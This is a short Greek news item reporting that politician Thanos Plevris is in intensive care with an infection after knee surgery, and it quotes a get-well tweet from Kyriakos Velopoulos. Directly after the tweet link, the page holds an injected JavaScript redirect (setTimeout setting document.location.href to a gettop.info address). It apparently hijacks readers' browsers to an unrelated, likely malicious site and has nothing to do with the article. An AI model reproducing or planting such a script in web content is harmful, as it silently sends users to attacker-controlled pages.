Στην εντατική με λοίμωξη του αναπνευστικού, ο Θάνος Πλεύρης

0
11

 

Σε μονάδα εντατικής θεραπείας ιδιωτικού θεραπευτηρίου νοσηλεύεται από την Κυριακή ο πρώην βουλευτής του ΛΑΟΣ και νυν στέλεχος της ΝΔ, Θάνος Πλεύρης, με λοίμωξη του αναπνευστικού, σύμφωνα με πληροφορίες.

Κρίσιμη, αλλά σταθερή, χαρακτηρίζουν ιατρικές πηγές την κατάσταση της υγείας του Θανάση Πλεύρη.

Σύμφωνα με τις ίδιες πληροφορίες ο πρώην βουλευτής της ΝΔ υπεβλήθη σε νέα χειρουργική επέμβαση υπό την εποπτεία αγγειοχειρουργού και λοιμωξιολόγου προκειμένου να αντιμετωπιστεί λοίμωξη την οποία υπέστη μετά από χειρουργείο στο γόνατο, το οποίο πραγματοποιήθηκε την προηγούμενη βδομάδα σε δημόσιο νοσοκομείο.

Η επέμβαση που είχε ο κ. Πλεύρης ως στόχο να καθαρίσει τη μολυσμένη περιοχή ολοκληρώθηκε στις 5 παρά το απόγευμα, και ο ασθενής μεταφέρθηκε στη Μονάδα Εντατικής Θεραπείας του θεραπευτηρίου, όπου συνεχίζουν την αγωγή οι θεράποντες ιατροί.

Περαστικά του ευχήθηκε ο πρόεδρος του κόμματος Ελληνική Λύση, Κυριάκος Βελόπουλος, μέσω ανάρτησής του στο Twitter, γράφοντας χαρακτηριστικά:

ΕΎΧΟΜΑΙ ΣΤΟΝ ΦΊΛΟ ΘΆΝΟ ΠΛΕΥΡΗ ΌΛΑ ΝΑ ΠΆΝΕ ΚΑΛΆ!ΦΊΛΕ ΔΥΝΑΤΟΣ… (ΆΛΛΟ Η ΠΟΛΙΤΙΚΉ ΆΛΛΟ Η ΑΝΘΡΏΠΙΝΗ ΦΙΛΙΑ) !ΠΕΡΑΣΤΙΚΆ ΘΑΝΟΜΟΥ @thanosplevris

https://twitter.com/velopky/status/798141993788592128 setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here